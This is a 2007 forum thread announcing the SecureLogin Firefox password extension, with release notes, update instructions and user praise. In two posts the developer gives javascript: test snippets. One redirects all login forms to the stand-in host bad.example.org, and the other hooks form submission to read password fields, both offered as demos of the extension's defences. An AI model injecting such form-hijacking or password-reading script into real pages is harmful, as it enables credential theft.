MozillaZine

[Ext] Opera Wand for Firefox - SecureLogin

Announce and Discuss the Latest Theme and Extension Releases.
-ck-
 
Posts: 219
Joined: November 6th, 2004, 1:40 am

Post Posted February 10th, 2007, 4:41 am

Could you possibly give us a user-selectable choice of activation keystroke?
I'm not crazy about ALT+N

madblueimp
 
Posts: 524
Joined: January 31st, 2007, 12:23 pm

Post Posted February 10th, 2007, 7:06 am

I thought about implementing a keyboard shortcut setting and halfway implemented it but didn't finish for these reasons:
- ALT+N isn't used yet according to http://kb.mozillazine.org/Keyboard_shor ... s_(Firefox)
- ALT+N can be performed with one hand
- most people don't bother about changing the hotkey
- There exists a keyboard shortcut extension, which can configure SecureLogin's shortcut as well => http://www.extensionsmirror.nl/index.php?showtopic=254
- The SecureLogin keyboard shorcut can be configured manually by changing the language files

madblueimp
 
Posts: 524
Joined: January 31st, 2007, 12:23 pm

Post Posted February 10th, 2007, 12:45 pm

I added a "Custom Update URL" as it can take a while until SecureLogin will be listet at addons.mozilla.org.
This way, you can update SecureLogin automatically.

To enable the auto-update without having to install the new version manually, you can do the following:

Close Firefox.

Open the following directory:
--> [YOUR FIREFOX PROFILE]/extensions/secureLogin@blueimp.net/

Open the contained "install.rdf" with a texteditor that can handle UNIX line feeds (\n).

Add the following line just behind the "optionsURL":
Code: Select all
<em>https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&amp;itemversion=%ITEM_VERSION%&amp;appid=%APP_ID%&amp;appversion=%APP_VERSION%&amp;appos=%APP_OS%</em>

Important: Instead of just "em" you have to use the tags "em:updateURL".

phpBB doesn't allow them to display properly. :|

Better explanation:
The entry must look like the examples described on http://developer.mozilla.org/en/docs/in ... #updateURL just with the url I provide:
https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&amp;itemversion=%ITEM_VERSION%&amp;appid=%APP_ID%&amp;appversion=%APP_VERSION%&amp;appos=%APP_OS%

After doing that, the update to version 0.4.1 should be available.

As an alternative, just install the new version 0.4.1 manually, which includes the updateURL.

madblueimp
 
Posts: 524
Joined: January 31st, 2007, 12:23 pm

Post Posted February 16th, 2007, 10:45 am

Version 0.5.2 released with new features:

- Warning if changing second level domain on login
- List of exceptions for websites which do not work with the "JavaScript protection on login" option
- Extended statusbar icon context menu with shortcuts to saved passwords, "remember passwords rejection list" and SecureLogin settings

madblueimp
 
Posts: 524
Joined: January 31st, 2007, 12:23 pm

Post Posted February 17th, 2007, 7:46 am

If you input and run the following JavaScript code in your location bar, after loading a page for which you saved passwords, you can test one of the security enhancements of the SecureLogin-extension:
Code: Select all
javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].action='http://bad.example.org';}})();

SecureLogin will ask you on login if you really want to login to bad.example.org. You are then able to stop the login and prevent sending your credentials to bad.example.org.

The icons tooltip show the changed login url as well.

madblueimp
 
Posts: 524
Joined: January 31st, 2007, 12:23 pm

Post Posted February 17th, 2007, 10:37 am

Another test, this time to demonstrate the optional "JavaScript protection on login":

Just input the following JavaScript code in your location bar and run it after loading a login page for which you saved your password before:
Code: Select all
javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].addEventListener('submit',function(event){for(var j=0;j<event.currentTarget.elements.length;j++){if(event.currentTarget.elements[j].type=='password')alert('Password: '+event.currentTarget.elements[j].value);}},false);}})();

Without active "JavaScript protection" your password will be displayed in a warning box (alert) on login.
If you enable the setting, this won't happen.

Therefore, I recommend you to activate the option "JavaScript protection on login" and add websites that don't work to the exception list.

spyder
 
Posts: 32
Joined: May 4th, 2004, 1:16 pm
Location: Macedonia

Post Posted February 17th, 2007, 1:29 pm

Thanks for this extension, and thanks for the frequent updates.

This is really nice, secure and handy.

jimfitter
Folder@Home

User avatar
 
Posts: 5220
Joined: January 28th, 2005, 11:17 am
Location: Chicagoland area

Post Posted February 17th, 2007, 4:55 pm

Very nice, very helpful extension. Works fine for me using Bon Echo 2.0.0.2pre.

Thank you.
Only a mediocre person is always at his best. - William Somerset Maugham

DMCrimson
 
Posts: 1025
Joined: February 13th, 2004, 6:11 am

Post Posted February 18th, 2007, 11:40 pm

Installed this, and immediately thought this to be one of the best extensions I've installed:)

madblueimp
 
Posts: 524
Joined: January 31st, 2007, 12:23 pm

Post Posted February 19th, 2007, 4:25 am

Wow, thanks for the praise. :)

Would be nice if you would vote for it when it shows up on addons.mozilla.org.
I hope it will not be too long until approval, by now it still says
Approval Queue Status: There are currently 360 add-ons awaiting review

Uncle Spellbinder

User avatar
 
Posts: 3519
Joined: May 28th, 2004, 4:52 pm
Location: Highland, IN - U.S.A.

Post Posted February 19th, 2007, 8:27 am

I can't say enough about SecureLogin. This has turned into one of my "must have" extensions for Firefox. I'd like to see the devs incorporate this into Firefox.
My Firefox Add-Ons Collection: Firefox Essentials

spyder
 
Posts: 32
Joined: May 4th, 2004, 1:16 pm
Location: Macedonia

Post Posted February 19th, 2007, 11:26 am

I second that!

DMCrimson
 
Posts: 1025
Joined: February 13th, 2004, 6:11 am

Post Posted February 19th, 2007, 9:10 pm

Also, I find this more usable than default behaviour of Firefox:) BTW: is there any option to disable the form index from showing up?

madblueimp
 
Posts: 524
Joined: January 31st, 2007, 12:23 pm

Post Posted February 20th, 2007, 6:15 am

DMCrimson wrote:BTW: is there any option to disable the form index from showing up?

Thanks for the hint - I just released version 0.5.3 which shows the form index only if there are really more than one valid login forms on the page.

madblueimp
 
Posts: 524
Joined: January 31st, 2007, 12:23 pm

Post Posted February 24th, 2007, 8:10 pm

Version 0.5.4 released:
- Secure Login now uses the saved userFieldName and passwordFieldName rather than searching for related fields in the form elements list.

Apart from that, the Secure Login project page has been redesigned for better accessibility and a better look.

The built-in Password Manager auto-fill feature has been improved as stated on Mozilla Foundation Security Advisory 2007-02:
The Firefox password manager was altered to take into account the destination site of the password data and only replay when a form's destination matches the one that was saved. This does not protect users if an attacker was able to inject script into the site in addition to form controls as the injected script could listen in on anything the user does.

In my opinion, auto-filling user+pass is still not secure as requiring a user action as is done with Secure Login.
Unfortunately, the newly saved form destination url seems not accessible for extension developers so far (no property additional property), as I would have liked to include this check as well.
But the Secure Login option to ask for confirmation on domain change adds protection in a similar way.

Return to Extension/Theme Releases


Who is online

Users browsing this forum: No registered users and 4 guests